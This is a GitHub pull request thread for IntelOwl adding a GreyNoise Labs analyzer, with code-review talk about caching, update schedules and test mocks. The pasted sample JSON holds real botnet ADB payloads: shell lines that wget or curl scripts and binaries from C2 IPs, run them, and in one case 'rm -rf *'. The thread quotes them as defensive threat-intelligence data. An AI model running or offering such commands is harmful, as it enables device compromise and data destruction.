Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

fixes #1758 - greynoise labs analyzer #2210

Closed
wants to merge 19 commits into from

Conversation

moonpatel
Copy link
Contributor

@moonpatel moonpatel commented Mar 19, 2024

Closes #1758 . If your PR is made by a single commit, please add that clause in the commit too. This is all required to automate the closure of related issues.)

Description

Please include a summary of the change and link to the related issue.

Type of change

Please delete options that are not relevant.

  • Bug fix (non-breaking change which fixes an issue).
  • Breaking change (fix or feature that would cause existing functionality to not work as expected).
  • New feature (non-breaking change which adds functionality).

Checklist

  • I have read and understood the rules about how to Contribute to this project
  • The pull request is for the branch develop
  • A new plugin (analyzer, connector, visualizer, playbook, pivot or ingestor) was added or changed, in which case:
    • I strictly followed the documentation "How to create a Plugin"
    • Usage file was updated.
    • Advanced-Usage was updated (in case the plugin provides additional optional configuration).
    • If the plugin requires mocked testing, _monkeypatch() was used in its class to apply the necessary decorators.
    • I have dumped the configuration from Django Admin using the dumpplugin command and added it in the project as a data migration. ("How to share a plugin with the community")
    • If a File analyzer was added and it supports a mimetype which is not already supported, you added a sample of that type inside the archive test_files.zip and you added the default tests for that mimetype in test_classes.py.
    • If you created a new analyzer and it is free (does not require API keys), please add it in the FREE_TO_USE_ANALYZERS playbook by following this guide.
    • Check if it could make sense to add that analyzer/connector to other freely available playbooks.
    • I have provided the resulting raw JSON of a finished analysis and a screenshot of the results.
  • If external libraries/packages with restrictive licenses were used, they were added in the Legal Notice section.
  • Linters (Black, Flake, Isort) gave 0 errors. If you have correctly installed pre-commit, it does these checks and adjustments on your behalf.
  • I have added tests for the feature/bug I solved (see tests folder). All the tests (new and old ones) gave 0 errors.
  • If changes were made to an existing model/serializer/view, the docs were updated and regenerated (check CONTRIBUTE.md).
  • If the GUI has been modified:
    • I have a provided a screenshot of the result in the PR.
    • I have created new frontend tests for the new component or updated existing ones.

Important Rules

  • If you miss to compile the Checklist properly, your PR won't be reviewed by the maintainers.
  • If your changes decrease the overall tests coverage (you will know after the Codecov CI job is done), you should add the required tests to fix the problem
  • Everytime you make changes to the PR and you think the work is done, you should explicitly ask for a review. After being reviewed and received a "change request", you should explicitly ask for a review again once you have made the requested changes.

@moonpatel
Copy link
Contributor Author

Screenshot from 2024-03-19 10-38-38

JSON output:

{
  "noiserank": {
    "errors": [
      {
        "message": "1.23.45.122 was not found in NoiseRank",
        "path": ["noiseRank"]
      }
    ],
    "data": null
  },
  "topknocks": {
    "errors": [
      {
        "message": "1.23.45.122 was not found in KnockKnock",
        "path": ["topKnocks"]
      }
    ],
    "data": null
  },
  "topc2s": {
    "data": {
      "topC2s": {
        "queryInfo": { "resultsAvailable": 1471, "resultsLimit": 147 },
        "c2s": [
          {
            "source_ip": "94.156.69.247",
            "c2_ips": ["103.172.79.74"],
            "c2_domains": [],
            "payload": "CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000����host::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000@\u0001\u0000\u0000\u0010b\u0000\u0000����shell:cd /data/local/tmp/; busybox wget http://103.172.79.74/w.sh; sh w.sh; curl http://103.172.79.74/c.sh; sh c.sh; wget http://103.172.79.74/wget.sh; sh wget.sh; curl http://103.172.79.74/wget.sh; sh wget.sh; busybox wget http://103.172.79.74/wget.sh; sh wget.sh; busybox curl http://103.172.79.74/wget.sh; sh wget.sh\u0000",
            "hits": 3934,
            "pervasiveness": 92
          },
          {
            "source_ip": "45.90.97.172",
            "c2_ips": ["45.90.97.58"],
            "c2_domains": [],
            "payload": "CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000����host::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000u\u0000\u0000\u0000\f%\u0000\u0000����shell:cd /data/local/tmp/; busybox wget http://45.90.97.58/skid.arm7; chmod 777 skid.arm7; ./skid.arm7 lol; rm -rf *\u0000",
            "hits": 3745,
            "pervasiveness": 83
          },
......

I have not included the whole response JSON as it was too large

@moonpatel moonpatel changed the title added new analyzer - greynoise labs fixes #1758 - greynoise labs analyzer Mar 19, 2024
@@ -0,0 +1,33 @@
# This file is a part of IntelOwl https://github.com/intelowlproject/IntelOwl
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

this file is not required cause this analyzer requires additional configuration

Comment on lines 25 to 31
"topc2s": {
"query_string": "query TopC2s { topC2s { queryInfo \
{ resultsAvailable resultsLimit } c2s { source_ip c2_ips \
c2_domains payload hits pervasiveness } } } "
},
}

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think the analyzer is cool. The only problem regarding this analyzer is this type of query that does not support IP addresses anymore.

For this cases, we usually make the analyzer work in a different way. We maintain a local cache of the data extracted from the Greynoise endpoint (a file in the system) and we open it once the analyzer is triggered.

Thanks to the update method, it is possible to define how to update this file and when.
Please check other analyzers like Tor, Maxmind, Feodo Tracker, etc that do something very similar to what I mentioned

Copy link
Contributor Author

@moonpatel moonpatel Mar 21, 2024

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey @mlodic , I have added the update method for this class and some modifications in run method. Here is the new output format after changing the run method.

{
  "noiserank": {
    "data": {
      "noiseRank": {
        "queryInfo": { "resultsAvailable": 1, "resultsLimit": 1 },
        "ips": [
          {
            "ip": "20.235.249.22",
            "noise_score": 12,
            "sensor_pervasiveness": "very low",
            "country_pervasiveness": "low",
            "payload_diversity": "very low",
            "port_diversity": "very low",
            "request_rate": "low"
          }
        ]
      }
    }
  },
  "topknocks": {
    "errors": [
      {
        "message": "20.235.249.22 was not found in KnockKnock",
        "path": ["topKnocks"]
      }
    ],
    "data": null
  },
  "topc2s": { "found": true }
}

@moonpatel
Copy link
Contributor Author

Hey @mlodic I have made the required changes, can you review them?

Copy link
Member

@mlodic mlodic left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

great! I think we are almost done!

"health_check_schedule": None,
"update_schedule": {
"minute": "0",
"hour": "*",
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

their docs says:

topC2s
Description
Return the top 1% of C2s ranked by pervasiveness GreyNoise has observed over the previous 24 hours. This data may be up to 4.5 hours old.

so we can reduce the number of update to once every 6 hours I'd say

def _monkeypatch(cls):
patches = [
if_mock_connections(
patch("requests.post", return_value=MockUpResponse({}, 200))
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

can you please write examples of outputs here in the tests? like the ones that you shared with me

In this way tests would run with a real output and we could also save an example of their reports here.

Please do a mock for every requests you do (2). See feodo tracker as an example

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Like one request whose ip is in noiseRank and one which is not in noiseRank, right? @mlodic

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

basically here the tests will cycle through the list of mocks that you write and use one of them every time the analyzer would try to do a http request of the chosen method.

So basically one mock for each request that you make, so one for each endpoint in greynoise

}

try:
logger.info("Fetching data from greynoise API.....")
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

please log the observable name too here otherwise static logs like this are useless considering that the base class already generates some generic logs like this

if not os.path.exists(db_location):
return False

logger.info("Data fetched from greynoise API.....")
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

same here

"base_path": "api_app.analyzers_manager.observable_analyzers",
},
"name": "Greynoise_Labs",
"description": "scan an IP against the Greynoise Labs API (requires authentication token obtained from cookies on greynoise website)",
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

please add markdown with link to the service here so it will be displayed in the gui

@moonpatel
Copy link
Contributor Author

Hey @mlodic, I made the required changes can you review them?

Copy link
Member

@mlodic mlodic left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

last thing and we are done

@moonpatel
Copy link
Contributor Author

Done @mlodic !
image

@@ -104,7 +112,9 @@ def _update_db(cls, auth_token: str):
}

try:
logger.info("Fetching data from greynoise API (Greynoise_Labs).....")
logger.info(
f"Fetching data from greynoise API ({cls._get_observable_name()})....."
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

it's enough to use self.observable_name cause it is inherited from the base class :P

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

but _update_db is class method and it cannot access observabl_name. I have already trie it but does not work. @mlodic

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

ah you are right, my bad. there is no need of anything else in the log so, you can revert to the previous message

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

hardcoded? @mlodic

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

yep

…est mock response in greynoise analyzer"

This reverts commit 90a4c22.
@moonpatel
Copy link
Contributor Author

Done @mlodic !

@mlodic
Copy link
Member

mlodic commented Mar 22, 2024

you reverted too many things :P

@moonpatel
Copy link
Contributor Author

Done @mlodic. I reverted to a different commit by mistake.

@moonpatel
Copy link
Contributor Author

Are there any more changes required? @mlodic

@mlodic
Copy link
Member

mlodic commented Mar 22, 2024

you could fix the tests :)

@moonpatel
Copy link
Contributor Author

I guess the error occurs when update tries to get auth_token. @mlodic


@classmethod
def update(cls):
auth_token = cls._get_auth_token()
Copy link
Contributor Author

@moonpatel moonpatel Mar 22, 2024

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think this is where the error occurs during testing.. But how to get the auth_token during testing? Like which file should I look for?

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

first we would need a new test for the update like we have for Feodo Tracker for instance : https://github.com/intelowlproject/IntelOwl/pull/2126/files

then, do not trigger Exception here:

                    if not os.path.isfile(value["db_location"]) and not self.update():
                        raise AnalyzerRunException(f"Failed extraction from {key} db")

in this way not only the test would work but the analyzer should not fail if 1 query out of 3 fails.
Please just write an error log but do not trigger the AnalyzerRunException that makes all the analyzer to fail

@moonpatel
Copy link
Contributor Author

moonpatel commented Mar 25, 2024

Now all the test cases are passing @mlodic .

@mlodic
Copy link
Member

mlodic commented Mar 25, 2024

last error remains

@moonpatel
Copy link
Contributor Author

moonpatel commented Mar 26, 2024

I tried logging the details of the response received when update is called during testing. It seems that response's status code is 500 and thus it returns False.

image

image

I tried sending the request using greynoise labs playground - https://api.labs.greynoise.io/1/docs/ with this header: Authorization: Bearer . To which I received a response with 500 status code.
image

So I think the problem is that the response.post is not mocked and the request is sent to the original URL. @mlodic

@mlodic
Copy link
Member

mlodic commented Mar 26, 2024

the CI runs with MOCK_CONNECTIONS as True and that actually means that the connection should be mocked. That's not the same if you are testing locally because MOCK_CONNECTIONS is False as default. This is because it makes sense to test the real connection locally.

To debug the problem better please use MOCK_CONNECTIONS as True

@moonpatel
Copy link
Contributor Author

Now there is a different error! @mlodic

@moonpatel moonpatel closed this Mar 27, 2024
@moonpatel moonpatel reopened this Mar 27, 2024
@g4ze
Copy link
Member

g4ze commented Mar 27, 2024

Pull from develop, there have been migrations :)

@moonpatel
Copy link
Contributor Author

moonpatel commented Mar 28, 2024

@mlodic I have opened a new pr with the latest migrations included from develop. (#2210)

@mlodic
Copy link
Member

mlodic commented Mar 28, 2024

Idk why a new PR is necessary but ok :P

@mlodic mlodic closed this Mar 28, 2024
@mlodic mlodic mentioned this pull request Mar 28, 2024
22 tasks
# for free to join this conversation on GitHub. Already have an account? # to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants